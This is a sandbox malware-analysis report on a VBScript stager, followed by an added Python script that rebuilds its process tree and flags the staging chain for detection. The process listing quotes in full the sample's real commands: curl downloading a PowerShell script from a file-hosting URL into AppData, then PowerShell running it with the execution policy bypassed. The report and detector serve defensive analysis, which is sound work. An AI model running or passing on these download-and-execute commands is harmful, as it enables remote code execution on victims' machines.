Analysis

max time kernel: 30s
max time network: 33s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 16/01/2023, 09:37

Static task: static1
Behavioral task: behavioral1
  Sample: asd.vbs
  Resource: win7-20221111-en
  4 signatures
  150 seconds
General

Target: asd.vbs
Size: 484B
MD5: 1663574ead24fc758c224a04057e9da3
SHA1: c2fb493d802d82d93cbb139ab3c3899c31a68bc4
SHA256: 7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba
SHA512: ab1d8b4e67f5b9772e2a34ce7ab5695f604fc510d255fdad3b12d1a0c2793c2706172d2f84a29e67f239cf951b328fab30e273b1ee383cee2db4add9704f3840
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's canned description adds "likely ransomware behaviour", but nothing else in this report supports that reading: the sample is a 484-byte stager whose only recorded actions are spawning cmd.exe, curl and powershell.exe, and no file encryption or mass file writes are logged. Treat the drive enumeration as environment probing unless the downloaded second stage shows otherwise.

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid    Process
  1616   powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description               pid    Process
  Token: SeDebugPrivilege   1616   powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs)
The sandbox logs each parent-to-child write three times, so the 15 rows describe five process creations. The distinct edges are listed once each; procid_target appears to be the sandbox's own process index for the target, not its Windows PID (the target PID is in the description).
  description                        pid    Process       procid_target
  PID 532 wrote to memory of 272     532    WScript.exe   28
  PID 272 wrote to memory of 764     272    cmd.exe       30
  PID 532 wrote to memory of 1820    532    WScript.exe   31
  PID 1820 wrote to memory of 772    1820   cmd.exe       33
  PID 772 wrote to memory of 1616    772    cmd.exe       34
Processes

C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"
  PID 532 [Suspicious use of WriteProcessMemory]
  |
  +-- C:\Windows\System32\cmd.exe
  |     "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
  |     PID 272 [Suspicious use of WriteProcessMemory]
  |     |
  |     +-- C:\Windows\system32\cmd.exe
  |           cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
  |           PID 764
  |
  +-- C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        PID 1820 [Suspicious use of WriteProcessMemory]
        |
        +-- C:\Windows\system32\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              PID 772 [Suspicious use of WriteProcessMemory]
              |
              +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                    PID 1616 [Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]

What the tree shows: asd.vbs is a two-step stager. It first shells out to curl to fetch a second-stage PowerShell script from files.catbox.moe into %APPDATA%\rr.ps1, then invokes that file with the execution policy overridden (-exec Bypass is the abbreviated -ExecutionPolicy Bypass; -C is -Command, so the path is run as a command). Each step is wrapped in cmd.exe /c cmd.exe /c, which is why every action sits three processes deep under WScript.exe.

Two caveats before trusting the 3/10 score. First, PID 764 has no child and no curl.exe process appears anywhere in the tree, so the download never ran: Windows 7 does not ship curl.exe (it was added to Windows 10 in version 1803), and the report records no file write for rr.ps1. The PowerShell stage (PID 1616) therefore most likely executed against a file that did not exist, and the real payload, whatever nvz0g1.ps1 contained at detonation time, was never analysed here. Second, SeDebugPrivilege and process enumeration under PID 1616 are consistent with ordinary PowerShell start-up on this image, not with observed payload behaviour. Re-detonate on a Windows 10 image, or retrieve the second stage separately, before drawing conclusions about what this sample does.
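The chain above can be rebuilt mechanically from the WriteProcessMemory rows and then run through a few staging-chain rules. The script below is an added example written for this page, not part of the sandbox report or its tooling: the 15 event rows and the six command lines are copied from this report into inline strings so it runs offline, while the rule set (a script-host list of wscript.exe, cscript.exe and mshta.exe, the curl/-o output-path pattern, the -ExecutionPolicy abbreviation list, and the "download step spawned no child" check) is the editor's own choice, not anything the report defines.

```python
"""Rebuild the process tree from the WriteProcessMemory IoCs and flag the
WScript -> cmd -> curl / powershell staging chain. Event rows and command
lines are copied from the report; the detection rules are the editor's own."""
import re
from collections import defaultdict

# Constructed input: the 15 WriteProcessMemory rows in the report's flattened
# "PID <src> wrote to memory of <dst> <src> <image> <index>" form.
WRITE_EVENTS = """
PID 532 wrote to memory of 272 532 WScript.exe 28
PID 532 wrote to memory of 272 532 WScript.exe 28
PID 532 wrote to memory of 272 532 WScript.exe 28
PID 272 wrote to memory of 764 272 cmd.exe 30
PID 272 wrote to memory of 764 272 cmd.exe 30
PID 272 wrote to memory of 764 272 cmd.exe 30
PID 532 wrote to memory of 1820 532 WScript.exe 31
PID 532 wrote to memory of 1820 532 WScript.exe 31
PID 532 wrote to memory of 1820 532 WScript.exe 31
PID 1820 wrote to memory of 772 1820 cmd.exe 33
PID 1820 wrote to memory of 772 1820 cmd.exe 33
PID 1820 wrote to memory of 772 1820 cmd.exe 33
PID 772 wrote to memory of 1616 772 cmd.exe 34
PID 772 wrote to memory of 1616 772 cmd.exe 34
PID 772 wrote to memory of 1616 772 cmd.exe 34
"""

# Constructed input: command line per PID, copied from the report's process list.
COMMAND_LINES = {
    532: r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"',
    272: r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1',
    764: r'cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1',
    1820: r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1',
    772: r'cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1',
    1616: r'powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1',
}

# Assumed rule parameters (editor's choice, not defined by the report).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
EVENT_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) \d+")
DOWNLOAD_RE = re.compile(r"\bcurl\b.*?(?:--output|-o)\s+(\S+)", re.I)
# -exec / -ex / -ep are accepted abbreviations of -ExecutionPolicy.
BYPASS_RE = re.compile(r"-(?:executionpolicy|exec|ex|ep)\s+bypass\b", re.I)
PS_TARGET_RE = re.compile(r"powershell(?:\.exe)?\s.*?-(?:command|c|file|f)\s+(\S+)", re.I)


def parse_write_events(text):
    """One (writer_pid, target_pid, writer_image) tuple per row."""
    return [(int(src), int(dst), img) for src, dst, img in EVENT_RE.findall(text)]


def build_tree(events):
    """Parent PID -> sorted unique child PIDs. The sandbox logs three writes
    per process creation, so the 15 rows collapse to five edges."""
    children = defaultdict(set)
    for parent, child, _image in events:
        children[parent].add(child)
    return {parent: sorted(kids) for parent, kids in children.items()}


def lineage(tree, pid):
    """PIDs from the root of the tree down to pid."""
    parent_of = {c: p for p, kids in tree.items() for c in kids}
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return chain[::-1]


def image_name(cmdline):
    """Lower-case executable name from the first (possibly quoted) token."""
    first = re.match(r'"?([^"\s]+)', cmdline.strip()).group(1)
    return first.rsplit("\\", 1)[-1].lower()


def analyse(tree, cmdlines):
    """Return (pid, rule, detail) findings for the staging-chain rules."""
    # Pass 1: paths written by curl, so pass 2 can spot their later execution.
    downloaded = {}
    for pid, cmd in cmdlines.items():
        m = DOWNLOAD_RE.search(cmd)
        if m:
            downloaded[m.group(1).lower()] = pid
    findings = []
    for pid in sorted(cmdlines):
        cmd = cmdlines[pid]
        chain = [image_name(cmdlines[p]) for p in lineage(tree, pid)]
        under_host = any(img in SCRIPT_HOSTS for img in chain[:-1])
        if DOWNLOAD_RE.search(cmd):
            if under_host:
                findings.append((pid, "curl-download-under-script-host", " -> ".join(chain)))
            if not tree.get(pid):
                # A cmd that invokes curl but spawned nothing: curl.exe never
                # started (Windows 7 ships no curl.exe), so the download failed.
                findings.append((pid, "download-spawned-no-child", cmd))
        if image_name(cmd) == "powershell.exe" and BYPASS_RE.search(cmd):
            findings.append((pid, "executionpolicy-bypass", " -> ".join(chain)))
            target = PS_TARGET_RE.search(cmd)
            if target and target.group(1).lower() in downloaded:
                findings.append((pid, "runs-downloaded-file", target.group(1)))
    return findings


if __name__ == "__main__":
    tree = build_tree(parse_write_events(WRITE_EVENTS))
    for pid in sorted(COMMAND_LINES, key=lambda p: lineage(tree, p)):
        print("  " * (len(lineage(tree, pid)) - 1) + f"[{pid}] {COMMAND_LINES[pid]}")
    for pid, rule, detail in analyse(tree, COMMAND_LINES):
        print(f"{pid}\t{rule}\t{detail}")
```

Run against this report the rules fire on PIDs 272, 764 and 1616 only: the two curl wrappers as downloads under a script host, PID 764 as a download step with no child (the failed curl.exe launch discussed above), and PID 1616 as a PowerShell execution-policy override that targets the very path curl was told to write. Sorting by lineage in the main block prints the tree in parent-before-child order. On real telemetry you would feed Sysmon Event ID 1 (ParentProcessId, CommandLine) into the same functions instead of the sandbox rows.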